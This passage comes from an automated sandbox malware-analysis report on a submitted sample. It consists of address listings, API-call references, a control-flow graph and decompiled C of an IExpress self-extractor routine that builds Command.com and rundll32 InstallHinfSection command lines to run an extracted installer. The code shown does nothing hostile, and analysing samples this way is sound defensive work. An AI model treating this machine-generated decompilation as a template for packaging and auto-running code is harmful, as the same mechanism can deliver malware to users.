                                                                                                                                                                                                                                            0x00a43fb9
                                                                                                                                                                                                                                            0x00a43fc2
                                                                                                                                                                                                                                            0x00a43fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43fc8
                                                                                                                                                                                                                                            0x00a43dfb
                                                                                                                                                                                                                                            0x00a43dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43e03
                                                                                                                                                                                                                                            0x00a43e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43e15
                                                                                                                                                                                                                                            0x00a43e17
                                                                                                                                                                                                                                            0x00a43e19
                                                                                                                                                                                                                                            0x00a43f94
                                                                                                                                                                                                                                            0x00a43fa4
                                                                                                                                                                                                                                            0x00a43f7c
                                                                                                                                                                                                                                            0x00a43f80
                                                                                                                                                                                                                                            0x00a43f8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43f8b
                                                                                                                                                                                                                                            0x00a43e2c
                                                                                                                                                                                                                                            0x00a43e30
                                                                                                                                                                                                                                            0x00a43e34
                                                                                                                                                                                                                                            0x00a43e36
                                                                                                                                                                                                                                            0x00a43f69
                                                                                                                                                                                                                                            0x00a43f6e
                                                                                                                                                                                                                                            0x00a43f70
                                                                                                                                                                                                                                            0x00a43f76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43f76
                                                                                                                                                                                                                                            0x00a43e3c
                                                                                                                                                                                                                                            0x00a43e43
                                                                                                                                                                                                                                            0x00a43e47
                                                                                                                                                                                                                                            0x00a43e52
                                                                                                                                                                                                                                            0x00a43e56
                                                                                                                                                                                                                                            0x00a43e5c
                                                                                                                                                                                                                                            0x00a43e61
                                                                                                                                                                                                                                            0x00a43e68
                                                                                                                                                                                                                                            0x00a43e70
                                                                                                                                                                                                                                            0x00a43e74
                                                                                                                                                                                                                                            0x00a43e7c
                                                                                                                                                                                                                                            0x00a43e80
                                                                                                                                                                                                                                            0x00a43e82
                                                                                                                                                                                                                                            0x00a43e82
                                                                                                                                                                                                                                            0x00a43e87
                                                                                                                                                                                                                                            0x00a43e87
                                                                                                                                                                                                                                            0x00a43e8b
                                                                                                                                                                                                                                            0x00a43e91
                                                                                                                                                                                                                                            0x00a43e94
                                                                                                                                                                                                                                            0x00a43e96
                                                                                                                                                                                                                                            0x00a43e96
                                                                                                                                                                                                                                            0x00a43e9b
                                                                                                                                                                                                                                            0x00a43e9b
                                                                                                                                                                                                                                            0x00a43e9f
                                                                                                                                                                                                                                            0x00a43ea2
                                                                                                                                                                                                                                            0x00a43ea4
                                                                                                                                                                                                                                            0x00a43ea4
                                                                                                                                                                                                                                            0x00a43ea9
                                                                                                                                                                                                                                            0x00a43ea9
                                                                                                                                                                                                                                            0x00a43ead
                                                                                                                                                                                                                                            0x00a43eb3
                                                                                                                                                                                                                                            0x00a43eb6
                                                                                                                                                                                                                                            0x00a43eb8
                                                                                                                                                                                                                                            0x00a43eb8
                                                                                                                                                                                                                                            0x00a43ebd
                                                                                                                                                                                                                                            0x00a43ebd
                                                                                                                                                                                                                                            0x00a43ec1
                                                                                                                                                                                                                                            0x00a43ec3
                                                                                                                                                                                                                                            0x00a43ec5
                                                                                                                                                                                                                                            0x00a43ec5
                                                                                                                                                                                                                                            0x00a43eca
                                                                                                                                                                                                                                            0x00a43eca
                                                                                                                                                                                                                                            0x00a43ece
                                                                                                                                                                                                                                            0x00a43ed5
                                                                                                                                                                                                                                            0x00a43ed9
                                                                                                                                                                                                                                            0x00a43ee0
                                                                                                                                                                                                                                            0x00a43ee6
                                                                                                                                                                                                                                            0x00a43eea
                                                                                                                                                                                                                                            0x00a43eec
                                                                                                                                                                                                                                            0x00a43eee
                                                                                                                                                                                                                                            0x00a43ef3
                                                                                                                                                                                                                                            0x00a43ef3
                                                                                                                                                                                                                                            0x00a43ef5
                                                                                                                                                                                                                                            0x00a43efa
                                                                                                                                                                                                                                            0x00a43efb
                                                                                                                                                                                                                                            0x00a43efd
                                                                                                                                                                                                                                            0x00a43f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43eff
                                                                                                                                                                                                                                            0x00a43eff
                                                                                                                                                                                                                                            0x00a43f05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43f05
                                                                                                                                                                                                                                            0x00a43efd
                                                                                                                                                                                                                                            0x00a43dc7
                                                                                                                                                                                                                                            0x00a43dce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43dd0
                                                                                                                                                                                                                                            0x00a43dd7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43dd9
                                                                                                                                                                                                                                            0x00a43ddb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43ddd
                                                                                                                                                                                                                                            0x00a43de1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43de1
                                                                                                                                                                                                                                            0x00a43d59
                                                                                                                                                                                                                                            0x00a43d65
                                                                                                                                                                                                                                            0x00a43d6a
                                                                                                                                                                                                                                            0x00a43d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43d6e
                                                                                                                                                                                                                                            0x00a43d75
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43d8f
                                                                                                                                                                                                                                            0x00a43d96
                                                                                                                                                                                                                                            0x00a43d98
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43d98
                                                                                                                                                                                                                                            0x00a43c8f
                                                                                                                                                                                                                                            0x00a43c98
                                                                                                                                                                                                                                            0x00a43cf1
                                                                                                                                                                                                                                            0x00a43cf3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43cfe
                                                                                                                                                                                                                                            0x00a43d11
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43d11
                                                                                                                                                                                                                                            0x00a43c9c
                                                                                                                                                                                                                                            0x00a43ca5
                                                                                                                                                                                                                                            0x00a43ca7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43cad
                                                                                                                                                                                                                                            0x00a43cb2
                                                                                                                                                                                                                                            0x00a43cb7
                                                                                                                                                                                                                                            0x00a43cc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43ce8
                                                                                                                                                                                                                                            0x00a43cec
                                                                                                                                                                                                                                            0x00a43ced
                                                                                                                                                                                                                                            0x00a43ced
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43ce8
                                                                                                                                                                                                                                            0x00a43c9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43c9e
                                                                                                                                                                                                                                            0x00a43c56
                                                                                                                                                                                                                                            0x00a43d35
                                                                                                                                                                                                                                            0x00a43d35
                                                                                                                                                                                                                                            0x00a43d3c
                                                                                                                                                                                                                                            0x00a43d48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43d48
                                                                                                                                                                                                                                            0x00a43c03
                                                                                                                                                                                                                                            0x00a43be2
                                                                                                                                                                                                                                            0x00a43be7
                                                                                                                                                                                                                                            0x00a43bee
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A43C11
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A43CDC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A48C42), ref: 00A43D8F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A43E26
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00A48C42), ref: 00A43EFF
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00A48C42), ref: 00A43F1F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00A48C42), ref: 00A43F40
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00A48C42), ref: 00A43F47
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A48C42), ref: 00A43F76
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A48C42), ref: 00A43F80
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A48C42), ref: 00A43FC2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                                                            • API String ID: 1032054927-2188045420
                                                                                                                                                                                                                                            • Opcode ID: 2b42c5ecfa60dcfe5880697c4432815b2f9e8bb09a3e45ff51338d638444bdad
                                                                                                                                                                                                                                            • Instruction ID: 8786930b11a2b55e893d749f474837ffaf53dc28f2d935f0f756aad58300c3f1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b42c5ecfa60dcfe5880697c4432815b2f9e8bb09a3e45ff51338d638444bdad
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5B1427E9083009BDB20DF648845B6B76E4EBD5740F10092DFA85D61D0EBB5CE4ACB92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 141 a41ae8-a41b2c call a41680 144 a41b2e-a41b39 141->144 145 a41b3b-a41b40 141->145 146 a41b46-a41b61 call a41a84 144->146 145->146 149 a41b63-a41b65 146->149 150 a41b9f-a41bc2 call a41781 call a4658a 146->150 152 a41b68-a41b6d 149->152 157 a41bc7-a41bd3 call a466c8 150->157 152->152 154 a41b6f-a41b74 152->154 154->150 156 a41b76-a41b7b 154->156 158 a41b83-a41b86 156->158 159 a41b7d-a41b81 156->159 166 a41d73-a41d7f call a466c8 157->166 167 a41bd9-a41bf1 CompareStringA 157->167 158->150 162 a41b88-a41b8a 158->162 159->158 161 a41b8c-a41b9d call a41680 159->161 161->157 162->150 162->161 175 a41d81-a41d99 CompareStringA 166->175 176 a41df8-a41e09 LocalAlloc 166->176 167->166 168 a41bf7-a41c07 GetFileAttributesA 167->168 170 a41d53-a41d5e 168->170 171 a41c0d-a41c15 168->171 173 a41d64-a41d6e call a444b9 170->173 171->170 174 a41c1b-a41c33 call a41a84 171->174 188 a41e94-a41ea4 call a46ce0 173->188 190 a41c35-a41c38 174->190 191 a41c50-a41c61 LocalAlloc 174->191 175->176 181 a41d9b-a41da2 175->181 178 a41dd4-a41ddf 176->178 179 a41e0b-a41e1b GetFileAttributesA 176->179 178->173 183 a41e67-a41e73 call a41680 179->183 184 a41e1d-a41e1f 179->184 186 a41da5-a41daa 181->186 195 a41e78-a41e84 call a42aac 183->195 184->183 189 a41e21-a41e3e call a41781 184->189 186->186 192 a41dac-a41db4 186->192 189->195 211 a41e40-a41e43 189->211 198 a41c40-a41c4b call a41a84 190->198 199 a41c3a 190->199 191->178 194 a41c67-a41c72 191->194 193 a41db7-a41dbc 192->193 193->193 200 a41dbe-a41dd2 LocalAlloc 193->200 202 a41c74 194->202 203 a41c79-a41cc0 GetPrivateProfileIntA GetPrivateProfileStringA 194->203 210 a41e89-a41e92 195->210 198->191 199->198 200->178 207 a41de1-a41df3 call a4171e 200->207 202->203 208 a41cc2-a41ccc 203->208 209 a41cf8-a41d07 203->209 207->210 213 a41cd3-a41cf3 call a41680 * 2 208->213 214 a41cce 208->214 216 a41d23 209->216 217 a41d09-a41d21 GetShortPathNameA 209->217 210->188 211->195 215 a41e45-a41e65 call a416b3 * 2 211->215 213->210 214->213 215->195 218 a41d28-a41d2b 216->218 217->218 222 a41d32-a41d4e call a4171e 218->222 223 a41d2d 218->223 222->210 223->222
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A41AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v527;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				char _v1552;
                                                                                                                                                                                                                                            				CHAR* _v1556;
                                                                                                                                                                                                                                            				int* _v1560;
                                                                                                                                                                                                                                            				CHAR** _v1564;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                            				CHAR* _t53;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                                                                                            				CHAR* _t90;
                                                                                                                                                                                                                                            				CHAR* _t92;
                                                                                                                                                                                                                                            				char _t105;
                                                                                                                                                                                                                                            				char _t106;
                                                                                                                                                                                                                                            				CHAR** _t111;
                                                                                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                                                                                            				intOrPtr* _t125;
                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                            				CHAR* _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				intOrPtr* _t146;
                                                                                                                                                                                                                                            				char* _t148;
                                                                                                                                                                                                                                            				CHAR* _t151;
                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                            				CHAR* _t155;
                                                                                                                                                                                                                                            				CHAR* _t156;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t48 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                                                                                                            				_v1564 = _a4;
                                                                                                                                                                                                                                            				_v1560 = _a8;
                                                                                                                                                                                                                                            				E00A41680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                            				if(_v528 != 0x22) {
                                                                                                                                                                                                                                            					_t135 = " ";
                                                                                                                                                                                                                                            					_t53 =  &_v528;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t135 = "\"";
                                                                                                                                                                                                                                            					_t53 =  &_v527;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t111 =  &_v1556;
                                                                                                                                                                                                                                            				_v1556 = _t53;
                                                                                                                                                                                                                                            				_t54 = E00A41A84(_t111, _t135);
                                                                                                                                                                                                                                            				_t156 = _v1556;
                                                                                                                                                                                                                                            				_t151 = _t54;
                                                                                                                                                                                                                                            				if(_t156 == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_push(_t111);
                                                                                                                                                                                                                                            					E00A41781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            					E00A4658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t132 = _t156;
                                                                                                                                                                                                                                            					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t105 =  *_t132;
                                                                                                                                                                                                                                            						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                            					} while (_t105 != 0);
                                                                                                                                                                                                                                            					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                            					if(_t111 < 3) {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t106 = _t156[1];
                                                                                                                                                                                                                                            					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                            						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						E00A41680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t138 = 0x2e;
                                                                                                                                                                                                                                            						_t57 = E00A466C8(_t156, _t138);
                                                                                                                                                                                                                                            						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            							_t139 = 0x2e;
                                                                                                                                                                                                                                            							_t115 = _t156;
                                                                                                                                                                                                                                            							_t58 = E00A466C8(_t115, _t139);
                                                                                                                                                                                                                                            							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									goto L43;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                            								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            									E00A41680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_push(_t115);
                                                                                                                                                                                                                                            									_t108 = 0x400;
                                                                                                                                                                                                                                            									E00A41781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                            									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                            										E00A416B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                            										E00A416B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = _t156;
                                                                                                                                                                                                                                            								 *_t156 = 0;
                                                                                                                                                                                                                                            								E00A42AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                            								goto L53;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t145 = _t125 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t76 =  *_t125;
                                                                                                                                                                                                                                            									_t125 = _t125 + 1;
                                                                                                                                                                                                                                            								} while (_t76 != 0);
                                                                                                                                                                                                                                            								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                            								_t146 =  &_v268;
                                                                                                                                                                                                                                            								_t157 = _t146 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t77 =  *_t146;
                                                                                                                                                                                                                                            									_t146 = _t146 + 1;
                                                                                                                                                                                                                                            								} while (_t77 != 0);
                                                                                                                                                                                                                                            								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                            								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                            								if(_t156 != 0) {
                                                                                                                                                                                                                                            									E00A4171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                            									goto L53;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L43;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t140 = 0x525;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t60 =  &_v268;
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t140 = "[";
                                                                                                                                                                                                                                            								_v1556 = _t151;
                                                                                                                                                                                                                                            								_t90 = E00A41A84( &_v1556, "[");
                                                                                                                                                                                                                                            								if(_t90 != 0) {
                                                                                                                                                                                                                                            									if( *_t90 != 0) {
                                                                                                                                                                                                                                            										_v1556 = _t90;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "]";
                                                                                                                                                                                                                                            									E00A41A84( &_v1556, "]");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									L43:
                                                                                                                                                                                                                                            									_t60 = 0;
                                                                                                                                                                                                                                            									_t140 = 0x4b5;
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									_push(0x10);
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									L35:
                                                                                                                                                                                                                                            									_push(_t60);
                                                                                                                                                                                                                                            									E00A444B9(0, _t140);
                                                                                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                                                                                            									goto L54;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t155 = _v1556;
                                                                                                                                                                                                                                            									_t92 = _t155;
                                                                                                                                                                                                                                            									if( *_t155 == 0) {
                                                                                                                                                                                                                                            										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									 *0xa49120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                            									 *_v1560 = 1;
                                                                                                                                                                                                                                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa41140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                            										 *0xa49a34 =  *0xa49a34 & 0xfffffffb;
                                                                                                                                                                                                                                            										if( *0xa49a40 != 0) {
                                                                                                                                                                                                                                            											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t108 = "setupx.dll";
                                                                                                                                                                                                                                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_push( &_v268);
                                                                                                                                                                                                                                            										_push(_t155);
                                                                                                                                                                                                                                            										E00A4171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										 *0xa49a34 =  *0xa49a34 | 0x00000004;
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										E00A41680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                            										_t140 = 0x200;
                                                                                                                                                                                                                                            										E00A41680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                                            									_t62 = 1;
                                                                                                                                                                                                                                            									 *_v1564 = _t156;
                                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                                            									_pop(_t152);
                                                                                                                                                                                                                                            									return E00A46CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}














































                                                                                                                                                                                                                                            0x00a41af3
                                                                                                                                                                                                                                            0x00a41afa
                                                                                                                                                                                                                                            0x00a41b07
                                                                                                                                                                                                                                            0x00a41b09
                                                                                                                                                                                                                                            0x00a41b1a
                                                                                                                                                                                                                                            0x00a41b20
                                                                                                                                                                                                                                            0x00a41b2c
                                                                                                                                                                                                                                            0x00a41b3b
                                                                                                                                                                                                                                            0x00a41b40
                                                                                                                                                                                                                                            0x00a41b2e
                                                                                                                                                                                                                                            0x00a41b2e
                                                                                                                                                                                                                                            0x00a41b33
                                                                                                                                                                                                                                            0x00a41b33
                                                                                                                                                                                                                                            0x00a41b46
                                                                                                                                                                                                                                            0x00a41b4c
                                                                                                                                                                                                                                            0x00a41b52
                                                                                                                                                                                                                                            0x00a41b57
                                                                                                                                                                                                                                            0x00a41b5d
                                                                                                                                                                                                                                            0x00a41b61
                                                                                                                                                                                                                                            0x00a41b9f
                                                                                                                                                                                                                                            0x00a41b9f
                                                                                                                                                                                                                                            0x00a41bb1
                                                                                                                                                                                                                                            0x00a41bc2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41b63
                                                                                                                                                                                                                                            0x00a41b63
                                                                                                                                                                                                                                            0x00a41b65
                                                                                                                                                                                                                                            0x00a41b68
                                                                                                                                                                                                                                            0x00a41b68
                                                                                                                                                                                                                                            0x00a41b6a
                                                                                                                                                                                                                                            0x00a41b6b
                                                                                                                                                                                                                                            0x00a41b6f
                                                                                                                                                                                                                                            0x00a41b74
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41b76
                                                                                                                                                                                                                                            0x00a41b7b
                                                                                                                                                                                                                                            0x00a41b86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41b8c
                                                                                                                                                                                                                                            0x00a41b8c
                                                                                                                                                                                                                                            0x00a41b98
                                                                                                                                                                                                                                            0x00a41bc7
                                                                                                                                                                                                                                            0x00a41bc9
                                                                                                                                                                                                                                            0x00a41bcc
                                                                                                                                                                                                                                            0x00a41bd3
